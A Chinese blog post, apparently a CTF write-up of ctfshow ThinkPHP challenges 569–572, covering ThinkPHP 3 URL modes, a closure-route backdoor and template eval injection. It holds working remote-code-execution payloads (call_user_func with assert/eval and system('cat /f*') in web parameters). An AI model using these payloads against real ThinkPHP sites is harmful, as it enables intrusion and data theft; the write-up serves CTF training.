ctfshow ThinkPHP专题 1

最新推荐文章于 2023-12-25 23:52:22 发布
最新推荐文章于 2023-12-25 23:52:22 发布
阅读量713 收藏 1
点赞数
分类专栏: 刷题 wp 文章标签: php ThinkPHP ctf 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/125924277
版权

web569

做这题之前,先补充下thinkphp3的URL模式,ThinkPHP支持的 URL模式有四种:普通模式、PATHINFO、REWRITE和兼容模式。

入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模 块、控制器和操作:

http://serverName/index.php/模块/控制器/操作

--普通模式:

普通模式也就是传统的GET传参方式来指定当前访问的模块和操作,例如:

http://localhost/?m=home&c=user&a=login&var=value

m参数表示模块,c参数表示控制器,a参数表示操作(当然这些参数都是可以配置的),后面的表示其他GET参 数。

--PATHINFO模式:

PATHINFO模式是系统的默认URL模式,提供了最好的SEO支持,系统内部已经做了环境的兼容处理,所以能够 支持大多数的主机环境。对应上面的URL模式,PATHINFO模式下面的URL访问地址是:

http://localhost/index.php/home/user/login/var/value/

PATHINFO地址的前三个参数分别表示模块/控制器/操作。

--REWRITE模式:

REWRITE模式是在PATHINFO模式的基础上添加了重写规则的支持,可以去掉URL地址里面的入口文件 index.php,但是需要额外配置WEB服务器的重写规则。

http://localhost/home/user/login/var/value

--兼容模式:

兼容模式是用于不支持PATHINFO的特殊环境,URL地址是:

http://localhost/?s=/home/user/login/var/value

其中参数s来自于ThinkPHP->Conf->convention.php中的VAR_PATH_INFO设置,可以更改兼容模式变量的名称定义

回到题目569,要求使用pathinfo模式进行访问,那么payload就简单了。(默认大小写不敏感)

payload:

http://671a5ba9-1876-433b-85fd-ed8f400f61fa.challenge.ctf.show/index.php/Admin/Login/ctfshowLogin

web570 

 

 补充下路由的知识

利用路由功能,可以让你的URL地址更加简洁和优雅。ThinkPHP支持对模块的URL地址进行路由操作(路由功能 是针对PATHINFO模式或者兼容URL而设计的,暂时不支持普通URL模式)。

ThinkPHP的路由功能包括:

  • 正则路由
  • 规则路由
  • 静态路由(URL映射)
  • 闭包支持

闭包定义

我们可以使用闭包的方式定义一些特殊需求的路由,而不需要执行控制器的操作方法了,例如:

'URL_ROUTE_RULES'=>array(
    'test' =>function(){
       echo 'just test';
       },

    'hello/:name' =>function($name){
       echo 'Hello,'.$name;
       }
)

当我们访问的url地址是:http://url/index.php/test,则浏览器输出的结果是: just test

当我们访问的url地址是:http://url/index.php/jack,则浏览器输出的结果是: Hello jack

 在Application/Commom/Conf/config.php中,发现闭包路由后门

 当我们访问url/index.php/ctfshow/aaa/bbb时,会执行call_user_func(aaa,bbb)函数

PHP函数详解:call_user_func()使用方法 - djiz - 博客园

 call_user_func(aaa,bbb) 就是执行aaa()函数,bbb当做其参数 

在用get传参是会出现;/传不进去的情况,这时可以这样传参:

#get
url/index.php/ctfshow/assert/eval($_POST[1])
#post
1=system('cat /fla*');

web571

ThinkPHP 3.2.3 漏洞复现 - 安全客,安全资讯平台

 Home\Controller\IndexController 下的index中传入了一个可控参数

 一路跟进到 fetch(),然后一路进入 Hook::listen('view_parse', $params);

    public function fetch($templateFile='',$content='',$prefix='') {
        if(empty($content)) {
            $templateFile   =   $this->parseTemplate($templateFile);
            // 模板文件不存在直接返回
            if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile);
        }else{
            defined('THEME_PATH') or    define('THEME_PATH', $this->getThemePath());
        }
        // 页面缓存
        ob_start();
        ob_implicit_flush(0);
        if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // 使用PHP原生模板
            $_content   =   $content;
            // 模板阵列变量分解成为独立变量
            extract($this->tVar, EXTR_OVERWRITE);
            // 直接载入PHP模板
            empty($_content)?include $templateFile:eval('?>'.$_content);
        }else{
            // 视图解析标签
            $params = array('var'=>$this->tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix);
            Hook::listen('view_parse',$params);
        }
        // 获取并清空缓存
        $content = ob_get_clean();
        // 内容过滤标签
        Hook::listen('view_filter',$content);
        // 输出模板文件
        return $content;
    }

yu22x: 

可以看到我们传入的n也就是content在TMPL_ENGINE_TYPE是php的情况下会进到eval函数中。

所以我们直接传php代码就可以了。
payload:

?n=<?php system('cat /f*');?>

web572

此题需要使用爆破来获得关键信息,非扫描,爆破次数不会超过365次,否则均为无效操作

 

 爆破日期出来,看到从?showctf 可以rce

/index.php?showctf=<?php system("cat /f*");?>

ThnPkm
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-thinkPHP5 RCE
朋克归零膏的博客
10-12 404
real题目我认为getflag是没意义的,幸运的是能从中学到一些技巧。在用大佬的poc对比官方的poc有一个细节。这题在尝试用命令执行写一句话的时候发现输入。,因此思路应该是将一句话分成两段然后拼一起。会被替换成空字符但是能单独写。
CTFshow——thinkphp专题
D.MIND 的博客
06-12 1568
570——闭包路由 关注这段代码:这是闭包路由的用法,官方:手册闭包支持 我们用phpinfo()函数测试一下:是可以的 /index.php/ctfshow/phpinfo/1 注意因为eval是一个语言结构而不是函数,所以这里是不能被call_user_func调用的,而assert是一个函数。因此我想到了assert(system("ls"));,但在尝试ls /时却不行了,很迷。 然后我想着参数转移一下。然后下意识构造出这样: /index.php/ctfshow/assert/$_POST[1
ctfshow web入门(thinkphp专题)
qq_53263789的博客
02-09 686
569 URL模式 查阅手册:URL模式 · ThinkPHP3.2.3完全开发手册 http://serverName/index.php/模块/控制器/操作 payload: 普通模式:/?m=Admin&c=Login&a=ctfshowLogin Pathinfo模式:/index.php/Admin/Login/ctfshowLogin 兼容模式:/?s=/Admin/Login/ctfshowLogin 570 路由 发现路由: 根据手册: 直接构造:这里直接执行不可以
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 878
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
ctfshow thinkphp专题
Sentiment的博客
05-25 1635
web569 主要就是考察了一个url解析模式 http://localhost/index.php/模块/控制器/操作/参数/值 payload: /index.php/Admin/Login/ctfshowLogin web570 Common/Conf/config.php,发现可利用点,一个闭包路由 'ctfshow/:f/:a' =>function($f,$a){ call_user_func($f, $a); } 传参发现也能正常执行 /index.php/ctfsho
Thinkphp 使用Dompdf
06-08
Thinkphp 使用Dompdf
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
ThinkPHP6.pdf
06-03
Thinkphp6入门到实战
thinkphp漏洞检测工具
06-06
thinkphp漏洞检测工具
thinkphp后台管理系统
04-06
thinkphp是一个基于thinkphp6的后台管理系统,对标laravel-admin。 think-admin特色: 1、composer库一键安装,丰富的配置项目 2、根据数据库自动生成增删改查,并生成相应的菜单和权限,减少基础机械重复工作 3、...
论文研究-基于ThinkPHP的网络安全演练竞技平台中CTF模块的设计与实现 .pdf
08-25
基于ThinkPHP的网络安全演练竞技平台中CTF模块的设计与实现,孙碧云,辛阳,针对于我国目前对网络安全人才实战性的培养需求,我们设计并实现了一个以ThinkPHP和Bootstrap框架为基础的网络安全演练竞技平台。平台�
【Web】Ctfshow Thinkphp3.2.3代码审计(2)
最新发布
uuzeray的博客
12-25 327
这段代码的作用是根据数据库字段类型的定义,对数据进行相应的类型转换,以确保数据的类型与数据库字段类型匹配,从而提高数据的准确性和一致性。比如数据库中的id是int型会进入intval函数,你输入1' union select * # 转换后就成了1。因为$options['where']是一个数组,所以会从if进入_parseType。其实很明显就是让$options['where']不为数组就可以了。所以要用一些路子,不进入到下面的if判断里。因为1是number,所以会让。这是我们不愿意看到的。
ctfshow-thinkphp
giaogiao123的博客
08-23 851
基础知识 关于thinkphp需要知道的基本知识 https://www.kancloud.cn/manual/thinkphp/1696 demo1 修改 D:\phpStudy\PHPTutorial\WWW\thinkphp-3.2\thinkphp-3.2\Application\Home\Controller\IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class Inde
CTF | 网络安全】攻防世界 php_rce 解题详析
等风来
05-22 5130
[CTF/网络安全] 攻防世界 php_rce 解题详析
[GYCTF2020]EasyThinking (ThinkPHP V6.0.0)
qq_62046696的博客
01-25 1535
但是发现无法直接读取flag,应该是需要通过执行readflag得到flag,这个时候发现终端不能执行命令,这也正是本题的第二个考点。打开以后就注册一些功能,注册admin admin,成功然后尝试search这个方法是否有任意文件读取漏洞,试了试没有任何的回显。ThinkPHP6.0.0版本,直接百度搜漏洞,任意文件写入漏洞,然后想到能不能直接写入一句话马,然后得flag。然后想法就是直接找到这个文件,直接蚁建出就可以,但是这个session保存在了哪呢,然后个人中心,显示的是自己的历史命令。
Ctfshow web入门 thinkphp专题
feng的博客
04-25 3189
web569 看一下thinkphp3.2.3官方手册,看完就都懂了: ThinkPHP3.2.3完全开发手册 首先就是路由的方式: http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本题考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web570 下载源码,在C
ctfphp漏洞,ctf入门到Thinkphp2.x、3.0-3.1版代码执行漏洞分析
weixin_39738380的博客
04-01 679
前言:文章可能有点长,小弟不才,只能靠刷ctf来理解一些内容。若有不恰当之处,望大佬们不吝赐教。一、[BJDCTF2020]ZJCTF先做一道ctf压压惊:[BJDCTF2020]ZJCTF构建以下payload,进入if判断,并且进入include()函数?text=data://text/plain,I have a dream&file=php://filter/convert.ba...
ThinkPHP 模板解析流程,研究笔记。
PHPer小成
07-18 2228
ThinkPHP 控制器-方法中,通过$this->display(); 来输出带有模板的视图。 那么就从这个方法入手。 1.Action.class.php  控制器基类 这是控制器基类,在这里面找到display()方法。 protected function display($templateFile='',$charset='',$contentType='',$content
ctfshow thinkphp
08-28
1. ThinkPHP是一款基于PHP语言开发的开源框架,被广泛应用于Web开发中。 2. 在CTF比赛中,可能会出现与ThinkPHP相关的题目,例如利用ThinkPHP的漏洞进行渗透、代码审计等。 3. 常见的一些ThinkPHP漏洞包括:SQL注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值